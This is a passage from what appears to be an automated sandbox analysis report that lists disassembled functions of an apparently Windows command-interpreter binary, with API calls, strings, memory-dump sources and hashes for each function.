                              • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                              • Instruction ID: e673dbaddcd4f3140031796f49296e6c29f2d1d82e9db71fdd6f21a76f444311
                              • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                              • Instruction Fuzzy Hash: EC125335A0C692C1EB24BF16A49417AA6A0FF44B90FD84235DE9D037E8EF3DE541A720
                              Function 00007FF744F286FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: LocalTime$ErrorLast_get_osfhandle
                              • String ID: %s$/-.$:
                              • API String ID: 1644023181-879152773
                              • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                              • Instruction ID: afbb29a62f2e140d1c20b5992957d8a12a6f4bc0d4d98db597663a07c6026f40
                              • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                              • Instruction Fuzzy Hash: 4E919322A0CA42D2EB10BF66D4802B9E6A0FF84B84FCC4235DD4E426DDDE3DE545E721
                              Function 00007FF744F2627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF744F27251), ref: 00007FF744F2628E
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ObjectSingleWait
                              • String ID: wil
                              • API String ID: 24740636-1589926490
                              • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                              • Instruction ID: 0a26a06a6b134e2d57132ff0621672f8f352521033e60e0a25c2c95e3e95aebf
                              • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                              • Instruction Fuzzy Hash: A9413F21A0C542C3F7607F12E48027AA6A1FF85785FE89131DD4946BD8DF3EE845A721
                              Function 00007FF744F2CDC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 94windowCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                              • String ID: $Application$System
                              • API String ID: 3377411628-1881496484
                              • Opcode ID: 081ad1a78538691813d500f2119477f8c8ef04af017c9f27d6f6f5b033d517ce
                              • Instruction ID: 7d003354ed1d1cc055c6362b48e16dd0549a41830c45f8198357cbd72b7a286f
                              • Opcode Fuzzy Hash: 081ad1a78538691813d500f2119477f8c8ef04af017c9f27d6f6f5b033d517ce
                              • Instruction Fuzzy Hash: 37411C32B08A41DAE720AF61E4803EDB7A5FB89748F885135DE4E42B98EF3CD145C750
                              Function 00007FF744F014E8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                              • String ID: :$\
                              • API String ID: 3961617410-1166558509
                              • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                              • Instruction ID: 7e6624ecb9c5e7ed21391dcad65f581443c02ec2c515290b2a0c53c609434465
                              • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                              • Instruction Fuzzy Hash: 73216221A0CA42C7E750BF62A6C4079E6A1EB89B56BCC4231DD1F463D8DF3CD4449620
                              Function 00007FF744F1258C Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 85COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F106C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106D6
                                • Part of subcall function 00007FF744F106C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106F0
                                • Part of subcall function 00007FF744F106C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F1074D
                                • Part of subcall function 00007FF744F106C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F10762
                              • _wcsicmp.MSVCRT ref: 00007FF744F125CA
                              • _wcsicmp.MSVCRT ref: 00007FF744F125E8
                              • _wcsicmp.MSVCRT ref: 00007FF744F1260F
                              • _wcsicmp.MSVCRT ref: 00007FF744F12636
                              • _wcsicmp.MSVCRT ref: 00007FF744F12650
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmp$Heap$AllocProcess
                              • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                              • API String ID: 3407644289-1668778490
                              • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                              • Instruction ID: 4d3e807708b7a280612284a41794b0d11a3177ec574e75bba1fe25758d262200
                              • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                              • Instruction Fuzzy Hash: 81311D21A1C542C6F7107FA3E895279E6A4AF84B40F9D8035DE0E562DDDE3CE804E721
                              Function 00007FF744F30C90 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 282COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                              • String ID: &()[]{}^=;!%'+,`~
                              • API String ID: 2516562204-381716982
                              • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                              • Instruction ID: 02cee971f4afe1e02a974d4d741b6003b0f2a3494c06e35c587cb0122f90f5a9
                              • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                              • Instruction Fuzzy Hash: B4C19072A19A51C6E754AF26E98027EB7A0FB44B94F885135EE8D03B9CDF3CE450E710
                              Function 00007FF744F17E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F0D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D46E
                                • Part of subcall function 00007FF744F0D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D485
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D4EE
                                • Part of subcall function 00007FF744F0D3F0: iswspace.MSVCRT ref: 00007FF744F0D54D
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D569
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D58C
                              • iswspace.MSVCRT ref: 00007FF744F17EEE
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heapiswspace$AllocProcess
                              • String ID: A
                              • API String ID: 3731854180-3554254475
                              • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                              • Instruction ID: 85cf29677a1db540bd2eb2a6c15a20ac2e49462d2df349e5e77da16022986b9d
                              • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                              • Instruction Fuzzy Hash: 81A16D2290DA82CAE760BF52A49067AF6A0FB55790F888035DE8D477DDDF3CA445E720
                              Function 00007FF744F2A39C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 111libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: MemoryProcessRead$AddressLibraryLoadProc
                              • String ID: NTDLL.DLL$NtQueryInformationProcess
                              • API String ID: 1580871199-2613899276
                              • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                              • Instruction ID: a6d01b80af5ddeb923fb487086b5a5b9c1bdb2e55106e10bdb9acd5ebfbdaea9
                              • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                              • Instruction Fuzzy Hash: 8C516172A1CB82C6EB10AF17A48017AB7A4FB88B84F895135DE5D03B98DF3CD501D710
                              Function 00007FF744F07420 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101fileCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                              • String ID: con
                              • API String ID: 689241570-4257191772
                              • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                              • Instruction ID: b4fab5fcf1c8ec6d39d312bbb32546894961f836ac65783edceedf4221cdf011
                              • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                              • Instruction Fuzzy Hash: 33418135A0CA45C7E310BF169484379BAA1F789BA5F984334DE29433D8CF7DD8499750
                              Function 00007FF744F2A58C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97memoryfileCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                              • String ID: PE
                              • API String ID: 2941894976-4258593460
                              • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                              • Instruction ID: 4dd6f995f69fc7891e918e7167e2190e00c22b5c7419d57fb063f96c21bc480e
                              • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                              • Instruction Fuzzy Hash: 0F414261A0C651C7E720BF62E490279FAA0FB89B90F884130DE5D42BD9DF3DE545DB20
                              Function 00007FF744F10010 Relevance: 13.7, APIs: 9, Instructions: 163fileCOMMON
                              Download Yara Rule
                              APIs
                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF744F2849D,?,?,?,00007FF744F2F0C7), ref: 00007FF744F10045
                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF744F2F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F10071
                              • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F10092
                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF744F100A7
                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F10148
                              • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF744F10181
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                              • String ID:
                              • API String ID: 734197835-0
                              • Opcode ID: 6daa823d36a278c72bc8dcf2d42bf9926b6fb5b8f0ec4fad86b12d1df65ba387
                              • Instruction ID: 37a0b0737f6b37a257764ce7d5b5681fec79e992cbe0e53fc09d1ea65e29cbfd
                              • Opcode Fuzzy Hash: 6daa823d36a278c72bc8dcf2d42bf9926b6fb5b8f0ec4fad86b12d1df65ba387
                              • Instruction Fuzzy Hash: C3617235A0C6A2CBE720BF26A884779FAB1BB45744F888135DD4D42BD8DF3CA945E710
                              Function 00007FF744F29B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Enum$Openwcsrchr
                              • String ID: %s=%s$.$\Shell\Open\Command
                              • API String ID: 3402383852-1459555574
                              • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                              • Instruction ID: e22584f8ea8b91f28cfba3215280dbf6fcfd0b0cc83845eab2d974f05baff222
                              • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                              • Instruction Fuzzy Hash: 03A18F61B0D642C2EB51BF56A0906BAE2A0FF85B90FC84535DE4D07BDCDE7DE941A320
                              Function 00007FF744F17610 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 228COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$wcscmp
                              • String ID: %s
                              • API String ID: 243296809-3043279178
                              • Opcode ID: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                              • Instruction ID: 401803ac2071e021df8d95128957a44982887a33159881c157a7bdb87b7f4350
                              • Opcode Fuzzy Hash: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                              • Instruction Fuzzy Hash: 14A17122A0DA86D6EB65FF22D8803F9A3A0FB44748F984135DE4D476D9DF3CEA449310
                              Function 00007FF744F01F90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$EnvironmentVariable
                              • String ID: DIRCMD
                              • API String ID: 1405722092-1465291664
                              • Opcode ID: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                              • Instruction ID: 47c07a94f2867e190ec060257c47bb4b09e4427102f1b62041a85d5503f5ed0c
                              • Opcode Fuzzy Hash: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                              • Instruction Fuzzy Hash: E5817F32A08BC1CAEB20EF61E8842EDB7A4FB84748F544139DE4D67B98DF38D5459710
                              Function 00007FF744F099F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 146COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F0CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDA6
                                • Part of subcall function 00007FF744F0CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDBD
                              • wcschr.MSVCRT(?,?,?,00007FF744F099DD), ref: 00007FF744F09A39
                                • Part of subcall function 00007FF744F0DF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF744F0CEAA), ref: 00007FF744F0DFB8
                                • Part of subcall function 00007FF744F0DF60: RtlFreeHeap.NTDLL ref: 00007FF744F0DFCC
                                • Part of subcall function 00007FF744F0DF60: _setjmp.MSVCRT ref: 00007FF744F0E03E
                              • wcschr.MSVCRT(?,?,?,00007FF744F099DD), ref: 00007FF744F09AF0
                              • wcschr.MSVCRT(?,?,?,00007FF744F099DD), ref: 00007FF744F09B0F
                                • Part of subcall function 00007FF744F096E8: memset.MSVCRT ref: 00007FF744F097B2
                                • Part of subcall function 00007FF744F096E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF744F09880
                              • _wcsupr.MSVCRT ref: 00007FF744F1B844
                              • wcscmp.MSVCRT ref: 00007FF744F1B86D
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                              • String ID: FOR$ IF
                              • API String ID: 3663254013-2924197646
                              • Opcode ID: f67f85f591da67d4ae817e2fb353553f76712647fd4c669d5220a84d1aca1485
                              • Instruction ID: 532f146e01a336ba834d2a0aa31ad4d6ff0f6d3810de0db775a606471dc59038
                              • Opcode Fuzzy Hash: f67f85f591da67d4ae817e2fb353553f76712647fd4c669d5220a84d1aca1485
                              • Instruction Fuzzy Hash: EF515F20B1D642C5EF14BF179498179A6A1AF85BA0FCC4635DE1E477D9EE3CE801A321
                              Function 00007FF744F0F173 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119COMMON
                              Download Yara Rule
                              APIs
                              • iswdigit.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F0D6
                              • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF744F0E626,?,?,00000000,00007FF744F11F69), ref: 00007FF744F0F1BA
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F1E7
                              • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF744F0E626,?,?,00000000,00007FF744F11F69), ref: 00007FF744F0F1FF
                              • iswdigit.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F2BB
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
